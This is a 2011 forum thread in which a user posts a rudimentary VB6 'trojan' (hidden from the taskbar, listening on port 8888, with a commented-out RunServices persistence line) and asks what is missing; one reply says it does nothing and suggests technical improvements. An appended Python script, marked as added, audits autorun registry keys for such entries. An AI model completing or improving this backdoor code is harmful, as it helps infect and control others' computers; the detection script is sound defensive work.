Please Help With VB6 Backdoor

2 replies to this topic

#1 cr@sh0v3rr!d3


    the 0ne

  • Members
  • 1 posts
  • Gender:Male

Posted 25 May 2011 - 04:19 PM

I forgot to search the forum before posting this thread. So if I double posted, please feel free to tell me.
Okay here is what I've got so far in my program (VB6 Program).

Private Sub Form_Load()
    Me.Visible = True
    App.TaskVisible = False
'    Dim Reg As Object
'    Set Reg = CreateObject("WScript.Shell")
'    Reg.RegWrite "hkey_local_machine\software\microsoft\windows\currentversion\runservices\" & _
'    App.EXEName, App.Path & "\" & App.EXEName & ".exe"
    TrojanWinsock.LocalPort = 8888
End Sub

Private Sub TrojanWinsock_Close()
End Sub

Private Sub TrojanWinsock_ConnectionRequest(ByVal requestID As Long)
    TrojanWinsock.Accept requestID
End Sub

Private Sub TrojanWinsock_DataArrival(ByVal bytesTotal As Long)
    Dim GotDat
    TrojanWinsock.GetData GotDat
    TrojanWinsock.SendData GotDat
End Sub

Private Sub TrojanWinsock_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
End Sub

But what I was wondering is, is there something missing in here
that should be in this code and isn't? Any help would be appreciated.
Thanks in advance.

#2 Afterm4th


    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 403 posts
  • Gender:Male
  • Country:
  • Location:way up north eh

Posted 26 May 2011 - 08:45 PM


#3 TheIllusiveMan


    Will I break 10 posts?

  • Members
  • 6 posts
  • Gender:Male

Posted 02 June 2011 - 02:37 AM

The script in itself doesn't actually do anything at all.

And even if it did... you should have called the API directly instead of dropping a control into the form. One of the reasons why is that VB6 uses wrapper classes for that control. These libraries simply aren't going to be installed on most computers. And RegCreateKeyEx should have been used instead of the Windows Script Host.
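
Added example, not part of the thread or any poster's code: a defender-side audit for the autorun entry that the commented-out RegWrite in post #1 would create, that is, a value named after the executable, under the RunServices key. The registry export text, the list of audited keys and the function names are constructed for illustration.

```python
import ntpath
import re

# Autorun keys to audit; RunServices is the key named in post #1.
AUTORUN_SUFFIXES = (r"\currentversion\run", r"\currentversion\runonce",
                    r"\currentversion\runservices",
                    r"\currentversion\runservicesonce")

# Constructed sample in `reg export` text form (not from a real host).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VendorTray"="C:\\Program Files\\Vendor\\tray_agent.exe"
"updater"="\"C:\\Users\\Public\\updater.exe\" /background"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"svchelper"="C:\\Temp\\svchelper.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Settings]
"Run"="C:\\Temp\\ignored.exe"
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
EXE_RE = re.compile(r'^"?([^"]+?\.exe)\b', re.IGNORECASE)

def unescape(text):
    # .reg string values escape backslashes and quotes with a backslash.
    return re.sub(r'\\(.)', r'\1', text)

def audit_autoruns(export_text):
    """Return (key, value name, exe path, reasons) for suspicious autoruns."""
    findings, key = [], None
    for line in export_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            key = path if path.lower().endswith(AUTORUN_SUFFIXES) else None
            continue
        m = VALUE_RE.match(line)
        if key is None or m is None:
            continue  # not a string value inside an audited autorun key
        name, data = unescape(m.group(1)), unescape(m.group(2))
        exe = EXE_RE.match(data)
        if not exe:
            continue
        stem = ntpath.splitext(ntpath.basename(exe.group(1)))[0]
        reasons = []
        if name.lower() == stem.lower():
            reasons.append("value name equals executable name")
        if "runservices" in key.lower().rsplit("\\", 1)[-1]:
            reasons.append("legacy RunServices key")
        if reasons:
            findings.append((key, name, exe.group(1), reasons))
    return findings
```

Legitimate software also names autorun values after its executable, so a hit is a triage lead rather than a verdict.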
